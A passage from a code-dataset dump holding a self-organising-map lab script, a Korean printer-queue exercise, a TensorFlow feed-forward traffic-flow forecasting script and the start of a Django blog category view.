i in range(neighbourhood*2+1):\r\n\t\t\t\tind = i + index - neighbourhood \r\n\t\t\t\tind = int(ind)\r\n\t\t\t\tif ind < 0:\r\n\t\t\t\t\tpass\r\n\t\t\t\telif ind > (len(W)-1):\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tW[(ind)] = W[(ind)] + step*(animal-W[(ind)])\r\n\t\t\t\t\tpass\r\n\r\n\r\n\r\n\treturn W\r\ndef epoch_iteration(iterations,animal_list,W,neighbourhood,step,original_neighbourhood):\r\n\tfor _ in range(iterations):\r\n\t\tW = sequencial_iteration(animal_list,W,int(neighbourhood-2),step)\r\n\t\tprint(neighbourhood)\r\n\t\tneighbourhood = neighbourhood - (original_neighbourhood/iterations)\r\n\treturn W\r\ndef main():\r\n\tneighbourhood = 52\r\n\tstep = 0.2\r\n\titerations = 20\r\n\tnodes = 100\r\n\tanimal_list = np.matrix(read_animals())\r\n\tW = initialize_weights(nodes,84)\r\n\tW = epoch_iteration(iterations,animal_list,W,neighbourhood,step,neighbourhood)\r\n\tout = output(animal_list,W)\r\n\tout_list = []\r\n\tnames_list = read_animals_names()\r\n\tfor x in range(nodes):\r\n\t\tlist_in_list = []\r\n\t\tfor y in out:\r\n\t\t\tif y ==[]:\r\n\t\t\t\tbreak\r\n\t\t\tif y[0]==x:\r\n\t\t\t\t\tlist_in_list.append(names_list[y[1]-1])\r\n\t\tout_list.append(list_in_list)\r\n\r\n\r\n\r\n\tread_animals_names()\r\n\tprint(out_list)\r\n\r\n\r\nmain()","sub_path":"lab2/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94197206","text":"n = int(input(\"작업 수 : \"))\n\nm = int(input(\"작업 번호 : \"))\n\npriority = list(map(int,input(\"작업 우선순위 : \").split()))\n\n\n\nin_printer = list(range(len(priority))) \n\ntime = 0\n\n\n\nwhile True:\n\n \n\n if priority[0] == max(priority): \n\n time = time + 1\n\n if in_printer[0] == m:\n\n print(time,'분')\n\n break\n\n else:\n\n priority.pop(0)\n\n in_printer.pop(0)\n\n else:\n\n priority.append(priority.pop(0))\n\n in_printer.append(in_printer.pop(0))\n \n\n\n\n\n\n\n\n \n \n\n\n\n\n","sub_path":"que printer.py","file_name":"que printer.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436985241","text":"from utils import DataLoader, define_bands, get_bands\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport csv\nimport datetime\nimport os\nfrom shutil import rmtree\nfrom tensorflow.python.client import timeline\n\n# from bnlstm.lstm import BNLSTMCell\n\n# Folder locations etc.\ntf.flags.DEFINE_string(\"data_dir\", \"../data/\", \"Storage Directory\")\ntf.flags.DEFINE_string(\"write_to\", \"../scratch/summaries\", \"Output directory\")\ntf.flags.DEFINE_string(\"summaries_dir\", \"../scratch/summaries\",\n \"Directory for Summaries\")\ntf.flags.DEFINE_string(\"model_name\", \"dummy_model\", \"Model Name\")\n\n# Data Handling Parameters\ntf.flags.DEFINE_string(\"dl_n\", \"DL_double_c.pkl\", \"Name of the data loader\")\ntf.flags.DEFINE_integer(\"n_stations\", 30, \"Number of stations\")\n\n# Model parameters\ntf.flags.DEFINE_integer(\"hidden_size\", 16,\n \"Number of hidden parameters in an LSTM block\")\ntf.flags.DEFINE_integer(\"n_ahead\", 24, \"Prediction times\")\ntf.flags.DEFINE_integer(\"single_station\", -1,\n \"index of the station to use. -1: use all stations\")\ntf.flags.DEFINE_integer(\"layers\", 2, \"Number of LSTM layers\")\ntf.flags.DEFINE_integer(\"window_size\", 48, \"Window size\")\ntf.flags.DEFINE_integer(\"cov_start\", 30,\n \"ignore everything before the variable with this index\")\ntf.flags.DEFINE_integer(\"num_cov\", 9,\n \"Number of covariates to use (known into the future)\")\ntf.flags.DEFINE_float(\"keep_rate_in\", 0.8,\n \"Input keep probability in LSTM dropout\")\ntf.flags.DEFINE_float(\"keep_rate_state\", 0.8,\n \"State keep probability in LSTM dropout\")\ntf.flags.DEFINE_float(\"keep_rate_out\", 0.8,\n \"Output keep probability in LSTM dropout\")\ntf.flags.DEFINE_bool(\"allow_batchnorm\", False, \"Switch on Batch normalisation\")\ntf.flags.DEFINE_bool(\"use_gru\", False,\n \"Use a GRU cell instead of an LSTM cell\")\ntf.flags.DEFINE_bool(\"use_stations\", True, \"Whether to include traffic values in training (for cov only model)\")\ntf.flags.DEFINE_bool(\"predict_raw\", True, \"True:Predict raw values, False:Predict deviations\")\ntf.flags.DEFINE_bool(\"show_diffs\", False, \"True:Use Diff bands\")\ntf.flags.DEFINE_bool(\"show_raw\", True, \"True:Use raw bands\")\ntf.flags.DEFINE_bool(\"show_last_week\", False, \"True:Use last-week-bands\")\n\n\n# Meta parameters\ntf.flags.DEFINE_float(\"learning_rate\", 0.0005, \"Learning rate\")\ntf.flags.DEFINE_integer(\"max_iter\", 1500, \"Number of Batches to train on\")\ntf.flags.DEFINE_bool(\"force_init\", True, \"Start training from scratch or not\")\ntf.flags.DEFINE_integer(\"halve_every\", 100000,\n \"Halve learning rate every n steps\")\ntf.flags.DEFINE_bool(\"overtrain\", False, \"Train on a single batch\")\ntf.flags.DEFINE_integer(\"num_sum_stat\", 50,\n \"Number of Summary stats to keep in BN\")\ntf.flags.DEFINE_integer(\"start_at\", 0, \"First allowed training point\")\ntf.flags.DEFINE_bool(\"profile\", False,\n \"Make profile (run only for very few steps)\")\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nCommand-line Arguments:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n\nFLAGS.numbers_used = get_bands(FLAGS.show_raw, FLAGS.show_diffs,\n FLAGS.show_last_week)\n# assert 7 < FLAGS.numbers_used < 16, \"Choose correct bands\"\n# assert FLAGS.show_raw or not FLAGS.predict_raw # if raw is predicted, then the data should be visible\n# assert FLAGS.show_diffs or FLAGS.predict_raw # if diffs are predicted, they should be visible\n\n\ndef main():\n if FLAGS.numbers_used > 0:\n relevant_indices = define_bands(FLAGS.numbers_used)\n FLAGS.num_bands = sum(relevant_indices)\n relevant_band = 0 if not (FLAGS.show_raw and not FLAGS.predict_raw) else 1\n\n global station_error\n summaries_dir = FLAGS.summaries_dir + \"/\" + FLAGS.model_name\n if os.path.isdir(summaries_dir) and FLAGS.force_init:\n rmtree(summaries_dir)\n if not os.path.isdir(summaries_dir):\n os.makedirs(summaries_dir)\n\n write_to = FLAGS.write_to + \"/\" + FLAGS.model_name\n if os.path.isdir(write_to) and FLAGS.force_init:\n rmtree(write_to)\n if not os.path.isdir(write_to):\n os.makedirs(write_to)\n\n if FLAGS.single_station > -1:\n n_stations = 1\n else:\n n_stations = FLAGS.n_stations\n eval_ = False\n\n with open(FLAGS.data_dir + FLAGS.dl_n, 'rb') as input:\n data_loader = pickle.load(input)\n data_loader.shuffle_starts_lstm()\n print(\"Loaded data_loader\")\n print(\"Training size: %s\" % data_loader.training_data.shape[0])\n data_loader.reset_params(batch_size=FLAGS.window_size,\n window_size=FLAGS.window_size,\n n_ahead=data_loader.n_ahead,\n valid_batch_size=FLAGS.window_size,\n start_at=FLAGS.start_at)\n\n n_ahead = np.array(range(FLAGS.n_ahead)) + 1\n input_ = tf.placeholder(tf.float32,\n [data_loader.batch_size, data_loader.window_size,\n FLAGS.num_cov + n_stations, FLAGS.num_bands],\n name=\"input_placeholder\")\n\n output_ = tf.placeholder(tf.float32,\n [data_loader.batch_size, len(n_ahead),\n FLAGS.num_cov + n_stations, FLAGS.num_bands],\n name=\"output_placeholder\")\n\n keep_rate_in = tf.placeholder(tf.float32,\n name=\"keep_rate_input_placeholder\")\n keep_rate_state = tf.placeholder(tf.float32,\n name=\"keep_rate_state_placeholder\")\n keep_rate_out = tf.placeholder(tf.float32,\n name=\"keep_rate_output_placeholder\")\n\n eff_rate = tf.placeholder(tf.float32, name=\"eff_rate_placeholder\")\n current_rate = FLAGS.learning_rate\n is_training = tf.placeholder(tf.bool, name=\"is_training\")\n\n # The model is multivariate and independent from covariates.\n # It solely predicts future flows from past flows (of all stations)\n\n l1 = tf.contrib.layers.fully_connected(\n inputs=tf.reshape(input_[:, :, : FLAGS.num_cov + n_stations * FLAGS.use_stations, :], [data_loader.batch_size, FLAGS.window_size * (FLAGS.num_cov + n_stations * FLAGS.use_stations) * FLAGS.num_bands]),\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l1d = tf.contrib.layers.dropout(l1,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l2 = tf.contrib.layers.fully_connected(\n inputs=l1d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l2d = tf.contrib.layers.dropout(l2,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l3 = tf.contrib.layers.fully_connected(\n inputs=l2d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l3d = tf.contrib.layers.dropout(l3,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l4 = tf.contrib.layers.fully_connected(\n inputs=l3d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l4d = tf.contrib.layers.dropout(l4,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l5 = tf.contrib.layers.fully_connected(\n inputs=l4d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l5d = tf.contrib.layers.dropout(l5,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n final_layer = {'1': l1d,\n '2': l2d,\n '3': l3d,\n '4': l4d,\n '5': l5d}[str(FLAGS.layers)]\n\n predicted = tf.reshape(tf.contrib.layers.fully_connected(\n inputs=final_layer,\n num_outputs=len(n_ahead) * n_stations,\n activation_fn=None\n ), [data_loader.batch_size, len(n_ahead), n_stations])\n\n target = output_[:, :, FLAGS.num_cov:, relevant_band]\n\n predict=predicted\n target_auto=target[:, :-1, :]\n\n # Losses\n l2 = (target - predicted) ** 2\n l2_selected = l2[:, :, :min(30, n_stations)]\n rmse_avg = tf.sqrt(tf.reduce_mean(l2))\n rmse_avg_selected = tf.sqrt(tf.reduce_mean(l2_selected))\n rmse_future = tf.sqrt(tf.reduce_mean(l2[:, -FLAGS.n_ahead:, :]))\n rmse_by_station = tf.sqrt(tf.reduce_mean(l2, axis=[0]))\n rmse_by_time = tf.sqrt(\n tf.reduce_mean(l2[:, -FLAGS.n_ahead:, :], axis=[0, 2]))\n rmse_by_time_selected = tf.sqrt(\n tf.reduce_mean(l2_selected[:, -FLAGS.n_ahead:, :], axis=[0, 2]))\n\n l2_auto = (target_auto - predict[:, :-1, :]) ** 2\n rmse_auto = tf.sqrt(tf.reduce_mean(l2_auto))\n\n # Optimisation\n global_counter = tf.Variable(1, trainable=False)\n global_counter_init = global_counter.assign(1)\n last_step = tf.placeholder(tf.int32)\n global_counter_end = global_counter.assign(last_step)\n best_step = tf.Variable(1, trainable=False, dtype=tf.int32)\n step_ = tf.placeholder(tf.int32)\n set_best_step = best_step.assign(step_)\n best_error = tf.Variable(9999999999, trainable=False, dtype=tf.float32)\n error_ = tf.placeholder(tf.float32)\n set_best_error = best_error.assign(error_)\n\n train_step = tf.train.AdamOptimizer(eff_rate).minimize(rmse_avg,\n global_step=global_counter)\n train_step_auto = tf.train.AdamOptimizer(eff_rate).minimize(rmse_auto)\n\n # Summaries\n rmse_avg_summary = tf.summary.scalar(\"rmse_avg\", rmse_avg)\n rmse_avg_summary_selected = tf.summary.scalar(\"rmse_avg_selected\",\n rmse_avg_selected)\n rmse_by_station_summary = tf.summary.histogram(\"rmse_by_station\",\n rmse_by_station)\n\n rmse_one = tf.summary.scalar(\"one_ahead\", rmse_by_time[0])\n rmse_one_hour = tf.summary.scalar(\"one_hour_ahead\", rmse_by_time[3])\n rmse_three_hours = tf.summary.scalar(\"three_hours_ahead\",\n rmse_by_time[11])\n rmse_six_hours = tf.summary.scalar(\"six_hours_ahead\", rmse_by_time[23])\n\n train_summaries = tf.summary.merge([rmse_avg_summary,\n rmse_avg_summary_selected,\n rmse_by_station_summary,\n rmse_one,\n rmse_one_hour,\n rmse_three_hours,\n rmse_six_hours])\n\n saver = tf.train.Saver(max_to_keep=1)\n saver2 = tf.train.Saver(max_to_keep=1)\n init_op = tf.global_variables_initializer()\n\n total_parameters = 0\n for variable in tf.trainable_variables():\n shape = variable.get_shape()\n print(variable.name)\n print(shape)\n variable_parametes = 1\n for dim in shape:\n variable_parametes *= dim.value\n total_parameters += variable_parametes\n print(\"Built a graph with a total of %d trainable parameters\" % (\n total_parameters))\n\n if FLAGS.overtrain:\n x, y = data_loader.get_one_batch()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :,\n list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :,\n list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n\n with tf.Session() as sess:\n time = datetime.datetime.now()\n if FLAGS.profile:\n options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n else:\n options = None\n run_metadata = None\n\n if not FLAGS.force_init:\n try:\n saver.restore(sess, tf.train.latest_checkpoint(write_to))\n print(\"Recovered Session\")\n except:\n sess.run(init_op)\n print(\"Unexpectedly initialised session\")\n # global_counter_init\n\n else:\n sess.run(init_op)\n print(\"Initialised session\")\n\n gc = sess.run(global_counter)\n\n print(\"Starting running the Graph\\n\")\n train_writer = tf.summary.FileWriter(summaries_dir, sess.graph)\n while gc < FLAGS.max_iter:\n\n # Validation first, to ensure gc does not increase\n if ((gc % 25000 == 0 and gc > 1) or (gc == 25000) or (\n gc == FLAGS.max_iter - 1)) and not FLAGS.overtrain:\n try:\n del time_error, time_error_selected, station_error\n except NameError:\n pass\n\n eval_ = True\n data_loader.reset_valid_indexes(shuffle=False)\n print(\"Start validation: %s\" % datetime.datetime.now().time())\n n = 0\n for j in range(\n int(len(\n data_loader.valid_indexes) /\n data_loader.valid_batch_size)):\n x, y, keep_v = data_loader.get_valid_batch_lstm()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations), relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations), relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1], sum(relevant_indices))\n else:\n x = x.reshape(\n [data_loader.valid_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n y = y.reshape(\n [data_loader.valid_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n n += x.shape[0]\n time_fut, station_fut, time_fut_selected = sess.run(\n [rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n try:\n time_error += (time_fut ** 2) * x.shape[0]\n time_error_selected += (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error += (station_fut ** 2) * x.shape[0]\n except NameError:\n time_error = (time_fut ** 2) * x.shape[0]\n time_error_selected = (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error = (station_fut ** 2) * x.shape[0]\n\n time_error = np.sqrt(\n time_error / n)\n time_error_selected = np.sqrt(\n time_error_selected / n)\n station_error = np.sqrt(\n station_error / n)\n print(\n \"Finished validation at %s\" % datetime.datetime.now().time())\n\n np.savetxt(\n os.path.join(write_to, 'eval_time_error.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error' + str(gc) + '.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to, 'eval_time_error_selected.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_selected' + str(\n gc) + '.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to, 'eval_station_error.csv'),\n station_error, delimiter=',')\n\n badness = np.sqrt(np.mean(np.square(time_error)))\n if badness < sess.run(best_error):\n sess.run([set_best_step, set_best_error],\n feed_dict={step_: gc, error_: badness})\n save_path = saver2.save(sess,\n os.path.join(write_to,\n 'model_best'))\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_best.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_selected_best.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_station_error_best.csv'),\n station_error, delimiter=',')\n else:\n if gc - sess.run(best_step) >= 200000 and gc > 500000:\n sess.run(global_counter_end,\n feed_dict={last_step: FLAGS.max_iter - 1})\n # End of validation on validation set\n\n if gc % 25000 == 0:\n # Every now and then reshuffle the batches and start from zero\n data_loader.shuffle_starts_lstm()\n\n # Then training\n if not FLAGS.overtrain:\n x, y, keep = data_loader.get_one_batch_lstm(\n allow_keep=(not eval_))\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n eval_ = False\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n if (gc % 75 == 0 and gc >= 1) or (gc == FLAGS.max_iter - 1):\n if gc < 750 or gc % 750 == 0:\n print(datetime.datetime.now() - time)\n time = datetime.datetime.now()\n if gc < 750 or gc % 750 == 0:\n print(\"Summary at iteration %s\" % gc)\n gc, predicted_, target_, summaries, rmse_by_time_, rmse_by_station_, rmse_by_time_selected_ = \\\n sess.run(\n [global_counter, predicted, target,\n train_summaries, rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n eff_rate: current_rate,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n\n train_writer.add_summary(summaries, gc)\n try:\n rmse_by_time__ = 0.9 * rmse_by_time__ + 0.1 * rmse_by_time_\n rmse_by_time_selected__ = 0.9 * rmse_by_time_selected__ + 0.1 * rmse_by_time_selected_\n rmse_by_station__ = 0.9 * rmse_by_station__ + 0.1 * rmse_by_station_\n except NameError:\n rmse_by_time__ = rmse_by_time_\n rmse_by_time_selected__ = rmse_by_time_selected_\n rmse_by_station__ = rmse_by_station_\n\n if (gc % 7500 == 0 and gc >= 1) or (gc == FLAGS.max_iter - 1):\n save_path = saver.save(sess,\n os.path.join(write_to, 'model'),\n gc)\n np.savetxt(write_to + \"/y_train.csv\", target_[0, :, :],\n delimiter=\",\")\n np.savetxt(write_to + \"/yhat_train.csv\",\n predicted_[0, :, :],\n delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_time_train.csv\",\n rmse_by_time__, delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_time_selected_train.csv\",\n rmse_by_time_selected__, delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_station_train.csv\",\n rmse_by_station__, delimiter=\",\")\n\n _, gc = sess.run(\n [train_step, global_counter],\n feed_dict={input_: x,\n output_: y,\n eff_rate: current_rate,\n keep_rate_in: FLAGS.keep_rate_in,\n keep_rate_state: FLAGS.keep_rate_state,\n keep_rate_out: FLAGS.keep_rate_out,\n is_training: False},\n options=options, run_metadata=run_metadata)\n\n current_rate = FLAGS.learning_rate / 2 ** int(\n gc / FLAGS.halve_every)\n if gc >= FLAGS.max_iter:\n save_path = saver.save(sess, os.path.join(write_to, 'model'),\n gc)\n # Test set (once on last, once on best)\n for jj in range(2):\n try:\n del time_error, time_error_selected, station_error\n except NameError:\n pass\n if jj == 0:\n print(\"Getting parameters of best validation set\")\n saver.restore(sess,\n tf.train.latest_checkpoint(write_to))\n print(\"Restored last parameters\")\n else:\n print(\"Getting parameters of best validation set\")\n saver.restore(sess,\n os.path.join(write_to, 'model_best'))\n print(\"Restored best parameters\")\n data_loader.reset_test_indexes(shuffle=False)\n n = 0\n for j in range(\n int(len(\n data_loader.test_indexes) /\n data_loader.test_batch_size)):\n x, y, keep_v = data_loader.get_test_batch_lstm()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1,\n FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1,\n FLAGS.num_cov + 1, sum(relevant_indices)])\n else:\n x = x.reshape(\n [data_loader.test_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n y = y.reshape(\n [data_loader.test_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n n += x.shape[0]\n time_fut, station_fut, time_fut_selected = sess.run(\n [rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n try:\n time_error += (time_fut ** 2) * x.shape[0]\n time_error_selected += (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error += (station_fut ** 2) * x.shape[0]\n except NameError:\n time_error = (time_fut ** 2) * x.shape[0]\n time_error_selected = (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error = (station_fut ** 2) * x.shape[0]\n\n time_error = np.sqrt(\n time_error / n)\n time_error_selected = np.sqrt(\n time_error_selected / n)\n station_error = np.sqrt(\n station_error / n)\n\n if jj == 0:\n suffix = \"_last\"\n else:\n suffix = \"_best\"\n np.savetxt(\n os.path.join(write_to,\n 'test_time_error' + suffix + '.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'test_time_error_selected' + suffix + '.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'test_station_error' + suffix + '.csv'),\n station_error, delimiter=',')\n # End of evaluation on test set\n if FLAGS.profile:\n fetched_timeline = timeline.Timeline(run_metadata.step_stats)\n chrome_trace = fetched_timeline.generate_chrome_trace_format()\n with open('timeline_01.json', 'w') as f:\n f.write(chrome_trace)\n print(\"All done\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"FFNN_flow_model.py","file_name":"FFNN_flow_model.py","file_ext":"py","file_size_in_byte":30985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295852505","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport json\nfrom django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.urls import reverse\nfrom backend.auth.auth import check_login\nfrom repository import models\nfrom utils.pagination import Pagination\n\n\n\n\n@check_login\ndef category(request):\n \"\"\"\n 博主个人分类管理\n :param request:\n :return:\n \"\"\"\n user = request.session['user_info']\n user_info = models.UserInfo.objects.filter(username=user['username']).first()\n blog_id = request.session['user_info']['blog__nid']\n #获取所有当前博客所有分类,及其每个分类所拥有的文章数\n obj =models.Category.objects.filter(blog__nid=blog_id).order_by(\"-nid\").values('nid','title')\n for item in obj:\n category_id = item['nid']\n item['counts']=models.Article.objects.filter(category_id =category_id).count()\n # obj =